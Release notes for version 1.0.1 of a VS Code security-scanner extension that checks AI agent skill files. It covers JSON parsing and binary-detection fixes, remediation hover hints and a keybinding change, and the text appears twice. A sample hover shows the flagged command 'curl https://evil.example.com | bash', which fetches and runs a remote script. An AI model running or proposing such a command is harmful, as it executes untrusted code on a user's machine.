v1.0.1 — GitHub Actions + VS Code extension v1.0.1
Release Notes — bawbel-integrations v1.0.1
Released: 2026-04-26
Repository: github.com/bawbel/bawbel-integrations
Component: VS Code Extension (bawbel.bawbel-scanner)
Marketplace: https://marketplace.visualstudio.com/items?itemName=bawbel.bawbel-scanner
What's new
This is a bug-fix and polish release for the VS Code extension. It fixes the core scanning pipeline that was broken in v1.0.0, adds inline remediation guidance for every finding, and resolves a keybinding conflict with VS Code's built-in build task.
Bug Fixes
JSON output parsing (#vscode-fix-001)
The extension was expecting { file, findings } but the bawbel CLI outputs a
top-level JSON array: [{ file_path, findings, risk_score, scan_time_ms, ... }].
This caused all scan results to be silently dropped — the status bar would update
but no diagnostics would appear. Fixed to correctly parse the actual CLI output schema.
Binary detection (#vscode-fix-002)
The extension was invoking python3 -m bawbel but bawbel-scanner installs a
direct binary at /usr/local/bin/bawbel (or ~/.local/bin/bawbel for user installs).
The module entrypoint does not exist in v0.2.0+. Fixed to call the bawbel binary
directly, with auto-detection across common pip install paths.
Empty hover tooltip (#vscode-fix-003)
Findings appeared as squiggles but hovering showed no useful detail — just the raw AVE ID with no context. Fixed to show full finding detail on hover: severity level with emoji, matched text, AVE ID, CVSS-AI score, engine, OWASP tags, and a direct link to the PiranhaDB record.
Keybinding conflict (#vscode-fix-004)
Cmd+Shift+B / Ctrl+Shift+B is VS Code's reserved shortcut for Run Build Task.
The extension was registering the same keybinding, silently overriding the built-in.
Changed to Cmd+Alt+B / Ctrl+Alt+B which has no conflicts.
New Features
Inline remediation hints
Every finding hover tooltip now includes a "How to fix" section with specific,
actionable guidance for that rule. Covers 12 rule IDs including bawbel-shell-pipe,
bawbel-external-fetch, bawbel-instruction-override, bawbel-memory-persistence,
bawbel-mcp-tool-poison, and more. For rules not in the local map, the finding's
description field is used as a fallback — no network call required.
Example hover output:
🟠 [HIGH] Shell pipe injection pattern detectedMatched: "curl https://evil.example.com | bash"
How to fix:
Remove curl|bash or similar pipe patterns. If code execution
is needed, use a sandboxed tool with explicit user consent.
AVE: AVE-2026-00004 | CVSS-AI: 8.8/10 | Engine: pattern
OWASP: ASI01, ASI07
Details: https://api.piranha.bawbel.io/records/AVE-2026-00004
Output panel logging
Every scan now logs raw stdout, stderr, exit code, and a per-file summary to the
"Bawbel Scanner" Output channel (View → Output → Bawbel Scanner). Makes it
straightforward to debug CLI issues, verify which binary is being called, and
confirm what the scanner is actually returning.
Scan timing
The Output panel summary line now includes scan duration in milliseconds per file:
✗ skill.md — 2 finding(s): 1 HIGH | risk 8.8/10 (14ms)
✓ clean_skill.md — clean (8ms)
bawbel.bawbelPath setting
New configuration option to explicitly set the path to the bawbel binary when
auto-detection fails (e.g. non-standard pip install prefix, virtual environments,
or custom PATH configurations).
Breaking Changes
bawbel.pythonPath removed
Replaced by bawbel.bawbelPath. The extension no longer invokes bawbel via Python —
it calls the binary directly. Update your VS Code settings if you had this configured:
// Before "bawbel.pythonPath": "/usr/bin/python3"
// After
"bawbel.bawbelPath": "/usr/local/bin/bawbel"
bawbel.extras removed
The CLI manages its own optional engine dependencies. This setting had no effect in v1.0.0 and has been removed to avoid confusion.
Keybinding changed
Cmd+Shift+B → Cmd+Alt+B (macOS)
Ctrl+Shift+B → Ctrl+Alt+B (Linux/Windows)
Upgrade
From VS Code Marketplace (recommended):
VS Code will show an update notification automatically. Click Update.
Manual install:
code --uninstall-extension bawbel.bawbel-scanner
# Restart VS Code
# Ctrl+Shift+X → search "Bawbel Scanner" → Install
Compatibility
| Component | Version |
|---|---|
| bawbel-scanner CLI | v0.2.0+ |
| VS Code | v1.85.0+ |
| Node.js (build only) | v14.17+ |
| TypeScript (build only) | v5.x |
Full Changelog
See CHANGELOG.md.
Links
# Release Notes — bawbel-integrations v1.0.1Released: 2026-04-26
Repository: github.com/bawbel/bawbel-integrations
Component: VS Code Extension (bawbel.bawbel-scanner)
Marketplace: https://marketplace.visualstudio.com/items?itemName=bawbel.bawbel-scanner
What's new
This is a bug-fix and polish release for the VS Code extension. It fixes the core
scanning pipeline that was broken in v1.0.0, adds inline remediation guidance for
every finding, and resolves a keybinding conflict with VS Code's built-in build task.
Bug Fixes
JSON output parsing (#vscode-fix-001)
The extension was expecting { file, findings } but the bawbel CLI outputs a
top-level JSON array: [{ file_path, findings, risk_score, scan_time_ms, ... }].
This caused all scan results to be silently dropped — the status bar would update
but no diagnostics would appear. Fixed to correctly parse the actual CLI output schema.
Binary detection (#vscode-fix-002)
The extension was invoking python3 -m bawbel but bawbel-scanner installs a
direct binary at /usr/local/bin/bawbel (or ~/.local/bin/bawbel for user installs).
The module entrypoint does not exist in v0.2.0+. Fixed to call the bawbel binary
directly, with auto-detection across common pip install paths.
Empty hover tooltip (#vscode-fix-003)
Findings appeared as squiggles but hovering showed no useful detail — just the raw
AVE ID with no context. Fixed to show full finding detail on hover: severity level
with emoji, matched text, AVE ID, CVSS-AI score, engine, OWASP tags, and a direct
link to the PiranhaDB record.
Keybinding conflict (#vscode-fix-004)
Cmd+Shift+B / Ctrl+Shift+B is VS Code's reserved shortcut for Run Build Task.
The extension was registering the same keybinding, silently overriding the built-in.
Changed to Cmd+Alt+B / Ctrl+Alt+B which has no conflicts.
New Features
Inline remediation hints
Every finding hover tooltip now includes a "How to fix" section with specific,
actionable guidance for that rule. Covers 12 rule IDs including bawbel-shell-pipe,
bawbel-external-fetch, bawbel-instruction-override, bawbel-memory-persistence,
bawbel-mcp-tool-poison, and more. For rules not in the local map, the finding's
description field is used as a fallback — no network call required.
Example hover output:
🟠 [HIGH] Shell pipe injection pattern detected
Matched: "curl https://evil.example.com | bash"
How to fix:
Remove curl|bash or similar pipe patterns. If code execution
is needed, use a sandboxed tool with explicit user consent.
AVE: AVE-2026-00004 | CVSS-AI: 8.8/10 | Engine: pattern
OWASP: ASI01, ASI07
Details: https://api.piranha.bawbel.io/records/AVE-2026-00004
Output panel logging
Every scan now logs raw stdout, stderr, exit code, and a per-file summary to the
"Bawbel Scanner" Output channel (View → Output → Bawbel Scanner). Makes it
straightforward to debug CLI issues, verify which binary is being called, and
confirm what the scanner is actually returning.
Scan timing
The Output panel summary line now includes scan duration in milliseconds per file:
✗ skill.md — 2 finding(s): 1 HIGH | risk 8.8/10 (14ms)
✓ clean_skill.md — clean (8ms)
bawbel.bawbelPath setting
New configuration option to explicitly set the path to the bawbel binary when
auto-detection fails (e.g. non-standard pip install prefix, virtual environments,
or custom PATH configurations).
Breaking Changes
bawbel.pythonPath removed
Replaced by bawbel.bawbelPath. The extension no longer invokes bawbel via Python —
it calls the binary directly. Update your VS Code settings if you had this configured:
// Before
"bawbel.pythonPath": "/usr/bin/python3"
// After
"bawbel.bawbelPath": "/usr/local/bin/bawbel"bawbel.extras removed
The CLI manages its own optional engine dependencies. This setting had no effect
in v1.0.0 and has been removed to avoid confusion.
Keybinding changed
Cmd+Shift+B → Cmd+Alt+B (macOS)
Ctrl+Shift+B → Ctrl+Alt+B (Linux/Windows)
Upgrade
From VS Code Marketplace (recommended):
VS Code will show an update notification automatically. Click Update.
Manual install:
code --uninstall-extension bawbel.bawbel-scanner
# Restart VS Code
# Ctrl+Shift+X → search "Bawbel Scanner" → InstallCompatibility
| Component | Version |
|---|---|
| bawbel-scanner CLI | v0.2.0+ |
| VS Code | v1.85.0+ |
| Node.js (build only) | v14.17+ |
| TypeScript (build only) | v5.x |
Full Changelog
See [CHANGELOG.md](https://github.com/bawbel/bawbel-integrations/blob/main/vscode/CHANGELOG.md).